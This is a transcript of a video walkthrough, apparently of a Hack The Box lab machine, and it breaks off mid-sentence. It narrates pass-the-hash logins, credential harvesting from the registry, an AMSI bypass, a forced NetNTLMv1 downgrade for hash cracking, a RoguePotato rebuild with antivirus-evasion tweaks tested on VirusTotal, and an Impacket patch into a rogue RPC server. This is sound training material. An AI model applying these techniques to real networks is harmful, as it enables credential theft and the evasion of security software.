client.py. This should support pass the hash to log into the share. -- help. X is not, I don't know what's going on with my SMB client. Let's see, SMB map. Will this work? Okay. -u, Henry.Vinson-p. We got to put that hash twice, or we can put a landman hash then NTLM. Let's see. Where is the hash? It's in this pane. That's why it's always important to know multiple tools. Okay, -h for host, localhost. What? Oh. I think lowercase h for password. No, password, it should detect hash. Henry.Vinson. Wonder if there's a domain, hdb.local. Probably shouldn't matter because this is a domain controller. Let's try putting that AAD3B. But I think something is going wonky with my Impacket library that's breaking this. So hopefully that doesn't cause me more issues later on. Let's see. P, if we say host is APT, this is probably because of IPv6. So not exactly sure what this error message is. So we're just failing all around. There is another thing we can do, and that is remote registry access, which is somewhat common, but generally doesn't reveal too much useful info. Kind of just like the enumerating RPC to get IP addresses or IPv6 addresses. It's not normally something that is too useful, but it is common to find. And the reason why remote registry is common is because Nessus kind of requires you to enable remote registry to do a lot of checks, or at least it used to. So you will find this remote registry setting being enabled, despite a lot of like hardening policies saying it should be disabled. So let's do reg.py -hashes, and we'll say that, and we have to grab our hash for the user. So there we go. And then the user is going to be hb.local/henry.vinson at localhost, and then we can query the registry. So -- or I think it's just -key name. And HKU for HKey users. So let's see what this does. Connection refused. Let's see. Henry.Vinson at localhost. Let's try at APT. Status pipe not available. It's gonna work. I don't know why it failed the first time, but it's not a super reliable one. And you may be able to get HKey local machine. The reason why it's not CU, because there's no like login session yet. So we just go to HKey users to see what's in that registry key. So we can look, at these environments. Out of these, the software is probably the one that would be most interesting, because every now and then software will store its secrets inside the registry. I think like PuTTY stores encrypted username and passwords in the registry and things like that. So looking at software, we can see in the HKey user software, there is this gigantic hosting management system key. So when we look at it, we will make a typo, probably. So let's just use a good old copy and paste so we don't make typos. It looks like I forgot a letter there, but we do have a username and password. And it's been a while since we've started taking notes. This username and password kind of reminded me, and it's one of those good things about like taking notes is every now and then you'll just go like on a roll and be like, oh, I probably should save this information. And then you just go back and save a bunch more. So Henry.Vinson, and we want to save this. And for this, I definitely want to put this in a table. So we'll do type user password notes. I think this is what I did in another video. And then type when user this, password's that, and the note for this will be the registry key. So we can save this. So when it comes time for writing the report, if we are, we will know exactly where this password was found. It doesn't really do them any good if you say, hey, you should change this password, and then they change it, and they update the software, and it goes back in the registry because the finding's still there. So always good to have some type of note. So we have that, and then we also have Henry.Vinson. So we can add him there. So this will be when Henry.Vinson, you can just grab the hash. And then the note for this will be password reuse. Old NTDS.DIT. There we go. Or instead, we can link 20 NTDS backup. There we go. So we can do a new note. Say 25 remote registry, and then paste our commands real quick. We want to grab this, and we can say list keys. It's probably bad terminology, but that's what, like, after you do the box and proofread, that's when you fix it. So now we have notes properly done for where we are. And that took what, like 3 minutes to do to stay on top of this note? So definitely something you should be doing as you work. And we can now do this poetry run yet again. And this will be Henry.Vinson. Let's go over to our accounts. And it's _ADM and this password. So _ADM and then -P for password. And we probably want to put that in quotes. And just say that you may not have to, but I see this hashtag, which is a special character. So that's why I put it in quotes. WinRM, bad response 400. Let's try SMB to see if it's valid. So we look at this. It is a valid account. And I wonder if we're just not forwarding the right port, if we need 5986. So I'm going to try doing that as well. And PowerShell remoting may also not like us bending the port. It may have some type of like man-in-the-middle weirdness that it protects itself against. So because we're doing this in like a unintended way because CrackMapExec doesn't support IPv6, we shouldn't always take what it's saying as gospel because it is doing HTTP. So maybe in our HTTP header, it's saying host localhost, which is why we're getting this error message. So that is why I kind of go on to try a different tool. So we're just going to try, Evil-WINRM. So I was making sure I typed the username correctly. So APT-U Henry.Vinson _ADM -P for the password, and we will put it in our single quotes. And see what happens. We are establishing connection and we get on. And this is weird. I don't know why it's doing that, but OXDF told me if I reinstall WinRM, it will fix it. So I'm going to see if it works. Gem install Evil-WINRM. He said remove it and then reinstall it, but I'm going to be lazy and just see if I can install it again. So we do this. Establishing connection, and it fixed itself. So that is weird that the input was like that, but hey, it's fixed now. So now we have a shell on the system. We can poke around at like the system to see if there's any interesting files here, but I don't believe there is other than user.txt in the desktop. We could also do like get AD user, I think administrator. Is this gonna work? And we can say -properties star to get me everything about it. And you can see cool things like password last set. So this is just queryable by domain users. So we can query that. We see administrator was set on September 24th, 2020. And if we go back to our SecretsDump, so less backup, SecretsDump, administrator. I'm going to be really sad if it's like the same date. Administrator. Password last set, September, what are these two dates? Let's see. SID history. That was PWD last set. 9/24. So the backup was created on September 22nd, and then administrator's password was changed 2 days later. So just pretty cool information you can get from querying things. But if you want to query everything by hand, it's going to take forever. So I'm going to run some .NET tools. So I'm just going to Google, I think, Sharp Collection, GitHub. Is this it? Yeah, nightly builds of common .NET stuff. Awesome. So hopefully we can run .NET 4.0 because that looks like what this is. So cd opt. Do I have Sharp collections here? grep-I was collection. Yeah, I do not. So I'm just going to git clone this to download all these .NET binaries. And let's see. I think we can kill off these Socats. There we go. Clean up our space a little bit. So now we have Sharp collection. And we can do like find.grep-IPs. Do we have WinPEAS? We do have WinPEAS. Probably gonna go with the oldest first, so .NET Framework 4.0. So I'm going to copy this and say menu here. And this is gonna display the Evil-WINRM menu, or I thought it would. Maybe I should reconnect to WinRM because this is, okay, there we go. We can do invoke binary and then opt Sharp collection net framework winpeas.exe and see if this works. If it doesn't, chances are AMSI blocked us, which in case we'll run bypass AMSI. And then if it doesn't work yet again, chances are we don't have the correct .NET version. So we can see script blocked by AV software. So let's try bypass AMSI. And we say we patched our PowerShell session. So we can run invoke binary now. And let's see if WinPEAS gives us anything. I paused the video because it took a little bit, but it had finished. So I'm going to just search my console back for invoke dash so we get back to the top. and we can go over this WinPEAS output. So let's see, we do have a password history file. So what I'm going to do is let's just create notes here, and we'll say 20 or 30 WinPEAS, and we're just going to paste everything we think is interesting. So we can copy this. And then keep going down. Laps is not installed. We kind of know that because the administrator password wasn't changed within 30 days. LSA protection, credential guard, cache creds, not too interesting. Here's the environment, nothing interesting there. HKCU, internet settings. This would be talking about the proxy if there was one. We have the ability to create directories at C:. So this is interesting if there's any unquoted service paths, because if there's an unquoted service path that is like hard coded to C:// program space files, Windows, if it's not quoted, if you create the directory program, it'll actually go into program instead of program files. It kind of just like has a few things it tries when it comes across a space. So that's why I log that. Let's see, UAC status, current token, auto login creds, but we don't have the password. We have access to, we are that user. I don't know why that's interesting. I see red and I get excited. Going down, installed applications, network shares, services. We can look at what's listening on like localhost because we may not be able to access that, but nothing too interesting. We do have some firewall rules, so this is why we couldn't hit the box from IPv4. Oh man, that did not paste well. Firewall rules. We'll just log that there are rules. Windows Vault, PowerShell commands ran. Panther, this is like a like Windows RSAT, I think, or it installs Windows over the network, but Microsoft long removed the password it stored left behind. But WinPEAS doesn't really find anything. There are other Windows enumeration tools. One famous one is Seatbelt, so I always like running that one as well. And let's go back to the .NET version of 4.0, and we will run Seatbelt. I'm just going to have to get rid of that /. And this can take some time to run, just like WinPEAS. Or let's see, we probably have to say something. So how do we run Seatbelt? Seatbelt group misc. I just want to do all. Come on, Seatbelt. Where is this? Dash group equals all. Run all the commands. That sounds like what I want. Let's see what happens here. And now watch, because I did this. Wait, what? Arrow running command dash group. Dash group equals all. Maybe this will work. On the plus side, we did see the output of Seatbelt, so we know it does run. Given the last one completed in like 3 microseconds or nanoseconds, whatever that is, and we don't have output yet, I'm assuming it did not want a space, it wanted an equal sign. So I'm going to pause the video, let this run, and we'll see what it tells us. It took around 5 minutes, but we do complete. It does say 260 seconds right there. So let's go to the very top of Seatbelt and see what we have. I'm going to do invoke dash again to get to the top. And then we're just going to look. So we can't enumerate AV, app blocker. There's this ARP table, audit policy, some auto runs telling us we're in VMware, our certificates for this user, the thumbprints, Chromium, Cred enumeration can't run, credgrid can't run, doing some DIRs, DNS cache. You can see it's a little bit more painful to go through this output because it's not color coding, but at least they do clearly label things. Explore run commands, file info, FileZilla, hotfixes, installed products. I wonder if we see gigantic host somewhere here. Laps is installed. That is a funny install date, 110001. I guess that is like install date of nothing, or maybe since everything's here, Seatbelt aired out trying to pull that date. Internet settings, laps, local groups. There's a lot of groups here. Administrators, probably should take more time and look through that. But yeah. Lol bins. Let's see, LSA settings. Map drives, McAfee. Named pipes that are running. Oh, we could have went back and if we looked at notes of what we took, we never looked at this PS history file. Just crossed my mind. Network profiles, NTLM settings. So we do see LAN-MAN compatibility level 2, and this is super old. This is a requirement to do NetNTLMv1, and we can see in session security, it supports NetNTLMv1. So what that is, it's a old protocol. If you ever crack like NetNTLM, it's always a v2 hash, not a v1. Microsoft did something really weird. Let's see. What is the talk name for this? DEFCON Net NTLMv1. There's a good talk about it. Yeah, DEFCON 2012. This is a good talk about it. So if you're watching the video and want to know more about this attack, instead of just seeing what we do, go to this talk because this will be correct information where I may say things that are wrong. But essentially, the attack is it takes the NTLM hash, divides it up into 3 times, and then does DES against each of them. And DES itself is weak. And since it kind of like divided the hash into 3, the encryption it did against each one has a small key space, and the challenge response, if you hard code it, it's now vulnerable to rainbow tables. So rainbow tables are like pre-computed hashes. So instead of doing something like, if, let's say your password is please subscribe, the salt, it should be random before it, right? So if the salt is always random, it's very hard to pre-compute the hash for please subscribe. However, if the salt was please subscribe, please subscribe. If this was a salt and we can hard code this, now we can do a pre-computed based attack against this. And that's what we're going to be doing with this is we're going to force a NetNTLMv1 authentication. We're going to set the hash to be like 1122334455667788, I think. It's either 77 or 88. I forget where it ends. But we're going to set the hash to be that, and then we can use an online service to crack the DES key because the salt is going to be the same. I think it's salt. I may be misusing terms, but that is what we do. So before we move on, we should copy this. So we have notes of what we did, and we can copy, go here, and I'm going to do seatbelt, and then we paste this. I wonder what it looks like in Bash. Let's do enumeration tools, enum, WinPEAS, seatbelt. You can look at how this looks, and it doesn't look too bad. So now we have that. It's going to be hard to pull off this attack. And this is where a lot of like the magic's going to come in, because we have to modify Impacket to create like a RPC server to handle this, which does get tough. Actually, let's just do the unintended method first, and then we'll do the intended method because the unintended is easier. And before we go modifying a bunch of files, I just want to show this works. So what this is going to do is going to take advantage of Defender being able to scan files on a network share. Microsoft has fixed this, so it no longer works on patched Windows, but it was a pretty cool, like, I don't know if it's called an O-Day, but pretty cool exploit. I wonder if I can do window 1 like that. No. CD Windows Defender. Go into this. And we can do mpcmd run.exe -scan. We can say scan type is equal to 3, which does a file. If you did 1, it would just be a quick scan. 2 would be a full scan. 3 is scan this file. And then we specify the file. So we can say 10.10.14.3 / please subscribe test. And now if we run responder, responder-i ton0, and run this command, we see we capture this NetNTLMv2 hash. But we want to do, oh wait, we capture NetNTLMv1. We didn't even have to specify v2. It'll automatically downgrade, I guess. That's pretty cool. The downside is it didn't set the challenge. So in order to set the challenge, we have to edit the responder config. So v-etc responder, then responder.conf. Probably do it with sudo. And then, let's see, is there a challenge response we can do? Custom challenge. So instead of challenge at random, we can say, shoot, there we go, 1122334455667788, and this is going to do that challenge we had mentioned. So now when I run this, we can do this. Oh, it's skipping previous hash. I don't want that. V responder.responder. Where's the responder database? DB? Responder.db. Let's see. Etsy responder responder.conf find.grep-i responder.db locate responder.db if I can type, that would help. So this is where the responder database is. I'm just going to delete it. Sudo, there we go. So now we can finally run responder again. And I'm going to do the flag just so we know we can downgrade NTLM, but apparently we don't have to. So now we can capture the hash, and we have a NetNTLMv1 hash, and this is what the challenge is: 1122334455667788. If we go up to the last time, it was just a random thing. So if we go to Crack.SH, this is an online tool to crack DES, and we should be able to crack it. So if we do get cracking, token, let's see, submit a job. Let's see, where do we go to crack? It was free. Let's read the instructions. So this is talking about capturing with responder. We do this. And let's see, we get username, hostname, response, response challenge. Oh, these are the same, 95A, 95A. So it just wants NT hash response. So if we just grab this, go back, NT hash, colon this, there we go. That is weird that just auto updates. And then we'll put root at ipsec.rocks and see if we get this eventually. So a job has been queued. In the meantime, we can check the status here. Unable to retrieve the status. We'll see if we get emailed as we go on, but it should email us the password if it decrypts it, and it should decrypt it, as long as we did everything correct, which looks like we did. So now while that goes, we can go and, I guess, log this. So I'm just going to do 35 NT hash, and I'm going to paste that, just so, actually, we'll do 100. So we have that. And later on, when we get this again, I'm just going to compare it if it is the same, because I believe that will, since our challenge is hard-coded. So let's go and do the piece of this box that I really don't want to do. And we'll have to modify RoguePotato, or RoguePotato, I should say. And we'll also have to modify Impacket. The RoguePotato is the simple one, so let's just start there. And to do that, we have to switch over to Windows. So I'm going to pause the video and go there. Over on Windows, I'm going to go to the RoguePotato source code. So we'll do RoguePotato GitHub. And we want to allow this to do IPv6. So let's clone this. And then open up in Visual Studio. So let's open folder. And we can go to, where is it? On desktop. RoguePotato. Maybe open solution. Project solution. That's what I wanted. Let's go to desktop. RoguePotato. And we can open this. Don't show again. And there is a line here that will set the IP address space. So let's see. I don't know exactly where it is. Let's see. Is this here? Let's see. iStorage trigger. Remote IP. It's not it. Let's see. What calls remote IP? This is going to be the part of the video that is probably going to get hard to follow. Oh, there we go. Right off the bat. So it is defined at 16. And this is indication that it's being treated as a string, I believe. I don't know exactly what's going on here. But an IPv4 address should only be 4 bytes or 32 bits. However, it's 16. So what I think it's doing is it's got a potential of 3 characters. So it's IP address of 123.123.123.123. And we got 3 periods. So this is going to be 15 characters, right? 16, so maybe they allow like a null byte at the end, or just want it to be divisible by 2. So yeah, that's why I think that is length of 16. Now, an IPv6 is going to be up to, 8 groups of 4. So it'd be like ABCD, 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 and so on. So what we want to do is it's 8 groups of 4, which will be 8 times 4 is 32. And then we want to, wait, is it? No, 8 times 4 is 4. Math and doing it live. 16 plus 16 is 32. Yeah, I'm right. 8 times 4 is 32. So 8 times 4 is 32. And then you have 8 colons, or maybe 7 colons. I don't know how many colons you have, but we'll say 40 is the length. So we'll change that 16 to be 40. And now we should have enough space to support IPv6 addresses. So let's now build the solution. So rebuild, and hopefully this builds and we can copy it over to our server. Come on, build. Generating code, rebuilt. Awesome. So we have RoguePotato.exe. It's in debug. Let's change it over to release and rebuild. Debug is going to include a lot of things, and I've just had experience where like debug mode wouldn't work, but release mode would. I don't know how to explain off the top of my head, but yeah, that's the case. It's something with like statically compiled libraries and things like that. So we have RoguePotato.exe. I'm going to copy this over to my Linux machine. We will rename it to just r.exe. In case I have RoguePotato elsewhere on my machine, we'll know r.exe is the one that has IPv6. So the weirdest thing happened when I was copying this file from my Windows VM to this Parrot VM. I copied from Windows to my host OS, which is also Windows, and everything was fine. And then I was copying it from my host OS to Parrot, and Defender freaked out and killed my whole Parrot VM. So I have had to reboot since I copied this, but we do have r.exe here, and I'm going to copy it up to the machine. So we're going to do Evil-WINRM yet again to get access to it. And then I'm going to upload, and we have it called r.exe. And we're going to try running it and see exactly what happens. It should upload just fine because I was in home HTTP APT, and that is where I've uploaded or put this r.exe. So it says it's been successful. I'm going to execute it with /r.exe, and we get the specified executable is not a valid application. I'm going to do file on it, and we see it is 64-bit. So I've seen this issue happen before, and for some reason, sometimes when we upload via WinRM, it uploads as like UTF-16 little endian or something, and it doesn't keep the format, and Windows doesn't recognize it. So what I'm going to do is we're going to make a directory, www, and move r.exe into www and host it via Python 3's HTTP server. Now we can curl 10.10.14.3, port 8000, r.exe-o, r.exe. So now we should, if we specify, 404 not found. Oh, I did not go into www. There we go. So now we should be able to download this executable, and when we go to run it, we have, it contains a virus. So we have a little bit of Defender evasion to do. So generally the very first step to Defender evasion is I go to the very beginning of the program, and I'm going to search for like the help string, this usage, and we're just going to replace it. We're just going to put, please subscribe here. Because a lot of AVs are static signatures based upon strings, and for some reason, a lot of the strings are based upon the usage. It's a stupid thing, but doing this mostly will fix AV issues. So I'm going to build this, we'll rebuild, and then I will copy it out of here. Once it finishes, it looks like it's building the Oxid resolver now. And then RoguePotato should finish. Come on. There we go, rebuild successful. So I'm going to put this on my clipboard so I can copy it over to my host, and then we're going to switch over to Parrot and drop it over here. So drag and drop, and we probably should be in the www directory. So we'll do that one more time to put it in www. So now I should be able to curl, and we want to call this RoguePotato.exe. So now when I execute /r.exe, it still did not work because it contains a virus. So the next step I want to do is strings it. So we're going to strings RoguePotato.exe grep-i for POT. So you can see all the strings of RoguePotato. I'm going to replace these with please subscribe. So let's go back over into a Windows VM. And I'm going to do a find. We're going to call RoguePotato. And the very first thing I do when I look for this is I make sure there's no like RoguePotato.h files, because if I do that, this find and replace is going to fail horribly. I don't see a RoguePotato.h, so chances are I'm fine. I'm going to put please subscribe there, and we are going to replace all. We replaced 11 occurrences. We can save everything. And then we go back to rebuild. And this takes a few seconds. I'm going to go over to my host real quick, delete RoguePotato, so we can copy a new version over in a second. And I did not expect to have to do this AV evasion. It generally worked for me. I don't know exactly what changed. I'm curious when I look at the write-ups if other people have ran into AV issues. Because when doing it for the first time, I did not, and the machine hasn't changed since I did it. So now we have RoguePotato there. I'm going to strings and grep for it. It's not there. If I grep for please subscribe, it is starting please subscribe. So if you haven't already, you should. We can go back to this curl, make sure web server is running, execute it. So r.exe, and we still have malware. So the next thing I'm going to do, and this is the most silly thing ever, is we're just going to change compile instructions. So I'm going to right click on my project, go to properties, go to C++, what is it? Optimization. Yeah, instead of favor speed, let's favor size. So we want the smallest executor possible. So both of these, let's favor small code, click apply, click build, rebuild this solution, and we're going to see what happens. And while this builds, I want to submit to VirusTotal. Because whenever I do this type of AV evasion, I start getting curious at how many things flag it. So here's the old one that we just did that we obfuscated a bunch of strings. So I'm going to upload this, and we'll see what flags. And then we're going to upload the second one. So we see cyber reason rising. I don't know what those are. Malwarebytes flags it. They are detecting is RoguePotato. Keep in mind, this is the one that we had replaced a bunch of strings in. So RoguePotato string does not exist in this binary. If we go into www and do a strings on RoguePotato, grep-i, pot, doesn't exist. This is the please subscribe one. And binaries are still, or AVs are still detecting it as RoguePotato. We are at 9 out of 67. And maybe I can go open another VirusTotal and we can submit a second submission maybe, just to see what happens when both of these are scanned. And this tab is going to be the one that we have ran the optimizations to favor code size. So we're going to see what flags. We have 9 out of 69 with our removed all stretches of RoguePotato, and we still have a few. So this is running. It's at 8 and 9 to 8. And the one that is missing looks like it's Microsoft, because Microsoft was around here, so I expect it to be at the second to bottom row, and I don't see it. So if we look at Microsoft, it's there. So Defender, I don't know what it was flagging on, but when we changed to favor size, it could care less. So what I'm going to do is I'm going to delete this whole folder, what we did. Actually, I'm not going to delete it. That could be horrible if I want to get back to this and this doesn't work. We'll call this .back. And we're going to do another clone. And let's see how many AVs detect RoguePotato right off the bat. So let's open up RoguePotato, right click, open in Visual Studio 2019. And then we are going to change this to only favor size. And when we do that, we'll compile and upload a VirusTotal to see what happens. And we probably should go with a control variable. So the control is going to be just a fresh build. So we want to see how many AVs will detect RoguePotato right off the bat. So that's why I'm doing this build, and it's in debug mode. So I'm going to have to change this into be release. I wish I could just control C out of a build. Debug is finished, so let's restart this with a release. And while it compiles, we can now change this to be the other thing to speed things up. So let's go C++, optimization. We can change this to be favor size and favor size here. Apply. Let's go RoguePotato, x64, release. We're going to upload this. So keep in mind, this tab over here is going to be our control. So I'm just going to drop RoguePotato there and confirm upload. Then we're going to rebuild this because we have now changed the project to favor size instead of speed. So let's go to VirusTotal, And if this works, like right off the bat, it's going to be hilarious and like a lesson on antivirus evasion. Like, speed is the devil when you want to evade antivirus. You'd be surprised with how many like sandboxes you evade by just putting like a 15 or 30-second sleep before you do your code. Because you're going to sleep and the AV for some reason decides, I'm going to give up on this code and then move on. I don't think that's the case here because I think this like compiler optimization is actually changing like how the bytes get put into the program. So that's not the case here, but it is funny. Come on, VirusTotal. I am not a robot. You're going to make me do like 4 of these, aren't you? Here's buses. Oh, God. No. There we go. That's 2. Sweet. So a 20 out of 69. Come on. For a second, I thought I'd get away with only doing 2. There's a sidewalk. So 20 both times. What the heck? Undetected. If you're watching this video, like I haven't put any sneaky cuts in. This doesn't make sense to me because I compiled it one time, it got detected. I changed some compile option. Well, I compiled it, it got detected, and then I removed a bunch of strings, still got detected. I changed some compile options, didn't get detected. Then I created the project again, did a fresh compile, and it went back to being undetected. I have no idea why that time it didn't. My only thought is maybe I changed the project properties before it got to this RoguePotato file, and it took them. So my control may be off. So maybe, like I said, speed is the devil when you want to evade AV. So this is the new control. We're just going to build, rebuild to see what flags it. I wish I left that open because I could have seen like the hashes uploaded to see if that file was the same. But let's just go to x64, release, and wait for RoguePotato.exe. But good news is we know when you favor the file size, Defender doesn't flag it. So here we go. Here's definitely one that we haven't made any changes to. And we were 20 out of like 69, I want to say. So we'll see what we are now. This is just a vanilla RoguePotato. There's no chance of any modifications. If Defender doesn't flag it, like, I don't understand AV evasion one bit anymore. So come on, let's see what you analyze. There we go. Microsoft flagged it. That's good. Yes. So Microsoft flagged it. We're at 22 now. So there's quite a few. There's 3 AVs that just favoring size decided not to flag. I did not copy the RoguePotato after changing this. So I probably should. So we'll do this. I'm sorry, guys. Let's do this one more time to favor size. Favor size and favor small code. There we go. Because I forgot to grab the binary after uploading it. So if you didn't believe me before, we're doing this step again. And then that will be it for AV evasion for this video. So thank you for sticking through with it. And maybe you just got bored and you clicked on the next topic. Because I do put those little topics in so you can skip around in these videos. So let's copy this. Put it here. We got RoguePotato.exe. Come on, VirusTotal. Confirm upload. And we're going to wait to see. So it's done, and there's 20. I'm not going to say which ones it didn't detect. I just know Microsoft is not on this detected list because Microsoft is... Where are you? Right there. So if you want to do your own detection, look here, and then look here. One of Zilia and Viper and Rising. Oh, wow. I just guessed. And the bottom 2, Zilia, Viper, and Microsoft. So there you go. There's the 3 that didn't detect. Where's Zilia? Zilia's here and Viper. Those detected it previously, along with Microsoft. So we can now copy a RoguePotato, copy it to my host machine, copy and replace, and we're going to go over to parent, and we're going to place RoguePotato, but first I'm going to delete it so I know we get this new one, copy it here, and for sake of explanation, please subscribe is not there. It is RoguePotato all throughout this binary. So let's do this curl again. And we're going to execute r.exe, and it now executes. We can specify netcat to listen on port 135 with sudo, of course. And then we're going to specify -r for remote, and then our IP address, which is IPADDR. And we want to do the IPv6 address, which is dead beef. So we'll copy this, and then -e to run a command. The command's not going to work because we don't have SE impersonate privilege. But just because we don't have SE impersonate privilege, that means we can't take ownership of the token and run a command, but we can still have it authenticate to us because that happens before we take ownership of the token. And because it's authenticating over NetNTLMv1, we can crack the hash and get the NTLM. So we run this, and oh, come on, demo gods. Do you have to do this to me? Why did you not work? It's listening on. I really don't know now. Specify -6. Let's also use netcat instead of NC. Even though it's the same based upon this. Shoot. Maybe it's port 139 or something. I guess we listen on all the ports. NC LVNP-6 445 sudo LVNP, we'll do 6 here. NC-6 LVNP 139. One of these should work. Oh, I am a total buffoon. So remember, like, to show AV evasion, I re-downloaded it. I forgot to edit again. So let's go back to the storage trigger. Where is the 16? Right here. We want to change this to be 40. Save it. Build, rebuild. So if you don't do this, you'll see the error message, I guess. Totally planned that I made this mistake. This is not improvisation at all. Let's copy this RoguePotato. Hopefully you don't view this as me wasting your time going through all these mistakes, because this is a relatively unique part of the box. And this whole NetNTLM downgrade, I've done it before in environments, generally not against Windows machines because you probably never see this configuration. But that being said, there are other things where you would see this configuration, such as like NASes, like attached storage, hardware devices, things like that, that love supporting everything. That's where you start seeing this type of stuff. Or even a printer. I've got a printer, like, because printers send scan jobs to SMB shares, I've got to connect to my SMB share and do a NetNTLMv1 before. So yeah, that's where you'd start seeing these things. So now we have this new one. And there we go. We got a connection on 135. All is right in the world. If we just use responder again, it's not going to work, because the responder is going to switch over to SMB, which is blocked. So if we do this --lm, we probably have to do sudo. We can run this again, and it just doesn't work. And I'm pretty sure that's because it's got to connect back over SMB. So now is going to be the hard part of this video, and that is editing Impacket to do all of our shenanigans that we want to do. So the very first step is to download Impacket. But before we do, let's find a patch that we want to apply to make Impacket be a RPC server. So I'm going to Google Impacket RPC server client, and there should be a gist that comes up. And this is going to be the patch that we do. So I'm just going to wget, not h, that. Yep. So we download that patch. So this patch was September 9th, 2020. So I'm going to go to Impacket. So we're going to do GitHub Impacket. And we're just going to clone this. So git clone Impacket. I'm going to copy this patch into Impacket. And we're going to go over to these commits and go back to around September, because that's probably the patch this was applied on. Unfortunately, the diff, I don't think it supplies the git commit ID. I went away from it. So we just kind of have to guess on how to do this. So git commit, we'll copy this one and go here, because this is also on September 9th. Actually, let's say he did not pull the same day. Let's go back one day. So he pulled it the day before, he was working with it, he did some things, and that's the commit we work out with. So git checkout, the commit. We're now on this branch, so we can apply the patch. So git apply, white space, we want to fix, and apply this patch. Let's see. And we get an error message. Some things already exist. So maybe this got put into Impacket's library or something, but whenever I see libraries exist and I'm trying to apply this patch, I want to go back. And this is the part where like me and OXDF have spent so long trying to get this exploit to work. What I know works is if we go back to Impacket, go to the release, and we grab the previous release, which is 9021. Why do you not show Impacket releases? And we'll start with this one, 9021. Come on, where's the download? I click you. There we go. So let's download this. Tar ZXVF, Impacket. And then let's copy this RPC patch into Impacket. And if we apply it, it's going to probably error still, but the error we can easily fix. So it's erroring right here on DCE RPC version 5 RPC CRT, and it's expecting to find this file, this MSRPC thing. So if we delete this directory, we may not have to do this, but because the patch failed to apply, I just want to redo it. So we'll copy the patch back into the Impacket directory, go into the Impacket directory, and VI goes Impacket DCE RPC version 5 RP CRT. Okay. And it wanted something here, this MSRPC RTS 0x14. So I put this file here, so the patch has it. And we're going to git apply and see if there's any error messages. What? Did not save? Or did like I not put the same line break it expected? That was unexpected. Copy. rm-rf, Impacket, tar, cp, go in, vi, add this line, save, apply. Okay, it's not erroring. I don't know what I did wrong there, but now we finally got this patch applied. So once you run the patch, make sure it applies. And the hard part is not even started yet. We have to make some edits. So let's go into Impacket examples, NTLM relay X, RPC, is it client? No, servers. Then RPC relay server. And we have to make some changes. So if we go to do NTLM negotiate, we're going to change this like entire function, because what it's at right now is doing like an NTLM relay attack, and we don't care about that. We could probably work it and do both, but like I'm lazy and I don't want to try to understand this code. So we delete most of everything. I'm going to keep that like if then error check in. But yeah, I think that's good. So what we want to do is do a self.client is equal to SMB relay client dot SMB relay client self.server.config and self.target. And self is passed into this. And this part probably won't make sense because I don't know, like, unless I do a multiple hour video, I don't know how I can explain this piece well. We just imported used the SMB relay client, so we have to import it. So from Impacket.examples, NTLM relay X clients, import SMB relay client. And if you don't know what these periods are, these are just directories. So if we do ls Impacket examples NTLM, that's all we're doing is going in. So we go back to this do NTLM negotiate function, and we have to still do a lot of things. So the very first thing is we want to send the negotiate. So what this did was we get a request on RPC and we're going to change it over to SMB. We could probably do this all in RPC if we're good coders. I am not a good programmer, so I converted to what I could figure out how to get working, which was SMB. So we got to make this self.challenge message, and that is just self client send negotiate token. And then on this challenge message, there is a value of challenge. And this is where we set that 1122 thing. So bytes from hex 11223344556677 88. It goes all the way up to 8. Okay. And then this next part is going to be confusing. We're going to do data is equal to byte array self.challenge message.get data. And that's going to get the data of this. And we actually have to change something in this. We have to disable ESS. I forget exactly what ESS is, but if you look at like drop the mic attack, it will come up. So we XOR it with 0xF7, which is NTLM SSP disable ESS. So this bit in this is the flag for ESS. And if we go to Google, we can say like drop the mic 0xF7, probably come up. Shoot. NTLM SSP disable ESS. Drop the mic. Let's do SMB. 0xF7. It should be in one of these attacks. I can't find it on Google right now, and I hope 0xF7 is what I'm looking for. But this piece of code probably doesn't make sense. And this is where like the box becomes insanely hard if you want to do it the intended way. So we change the challenge message now to equal bytes data. So convert to SMB. Set challenge to crackable and disable ESS. Okay, so that piece is done. The next piece of code we have to do is in the handshake. So I'm going to search for message type. If I can type message type, there we go. And this is going to be each, like, when we receive a message, what we do. So that's the auth negotiate, this is the auth challenge, and then this is challenge response. This is what we want to edit because this is going to be after the client authenticates to us. So we're going to pretty much delete everything after this, because after this code, things don't matter anymore because we already got the message. So I'm just going to remove those. Let's see. This exception, I don't know where this try is, so I'm just going to remove that as well. And that looks better. And we're going to use a function that we have imported earlier. This is, well, we didn't import it. It started out. We have output to John format. So let's go back to message type. And we will want to do NTLM hash data is equal to output to John format, then bytes dot from hex 1122334455667788. And then for readability, we can split this on multiple lines. We're going to have to grab 4 things: the username, domain, landman, and NTLM hash. So authenticate message, then user underscore name. And I'm just going to yank this line and put it 4 times. So we can do the domain name and then landman. And then the last one is NTLM. Okay. And we just want to print data. I'm just going to do a log message. I'm going to use log.error to stand out. So log.error, I'm going to say NTLM hash data and the hash string. This is part of the output to John thing. And NTLM hash data hash underscore version. There we go. So now on the response, we're logging this. And we can try running this to see if it works. Spoiler, it's not going to work yet, but doesn't hurt to try. Let's see. Oh, we have to create our actual RPC script. So I'm going to take pretty much an example. Let's see. Examples NTLM relay X. If we maybe go to, Impacket. Examples, NTLM relay X, clients, and is there a RPC relay client? We're pretty much going to take this, but this is a lot of code. And when doing things, it's nice to have as little lines as possible, because if there's something that goes wrong, there's less parts to like step through your breakpoint and no. And their clients, I think this had like some send negotiate messages, which we don't need because, yeah. So I'm just going to create a new one. I'm going to less on this example because it's probably got a lot of imports that I want. Let's see. Does this actually, what if there's a different example? If we go to examples, do we have any RPC? That's RPC dump. Let's see. Or there's examples NTLM. Where is it? NTLM relay. Maybe this one's a better example to go from. Looking at these imports, it is. But we have this like mini shell that we don't want to do. And yeah, this is pretty much the example I was looking for. But a lot more options than we need, and I don't want to put a bunch of like command line arguments, because this is argparse right here where it's like, do we support SMB2 support? And that's if in Impacket you do -SMB2 support, then it will add it there to be true. So let's grab this. We probably don't need that SOC server. Just going to grab all of these, copy. V RPC task.py, I guess, and set mode to paste. Paste this in. We don't need URL lib, so we can delete that. Probably don't need JSON or threading. Threading is like the devil when you're trying to do anything. We don't need CMD. CMD is like that command line wrapper where the mini shell was. Version, we probably don't need that. We don't need HTTP relay server, but we should be fine. Let's do logger.init to initialize our logger. And now we can set the logger to be debug level. So logging.get logger.set level logging.debug. So we did this because we want to get Impacket logs, and I want to get all the Impacket logs, so I just set it to debug. Now we're going to do what we saw in that other script, the C equals thing. If we go here, C equals this NTLM relay config, and I'm going to handpick a bunch of options I want out of here. So we're going to do C equals NTLM relay config, and it's relay x config. And we want to do c.set encoding sys.get default encoding and c.smb to support to be true, because we are relaying from an RPC connection back to SMB for simplicity. Then set listening port to be 135, so Impacket will listen on port 135. And then c.set interface 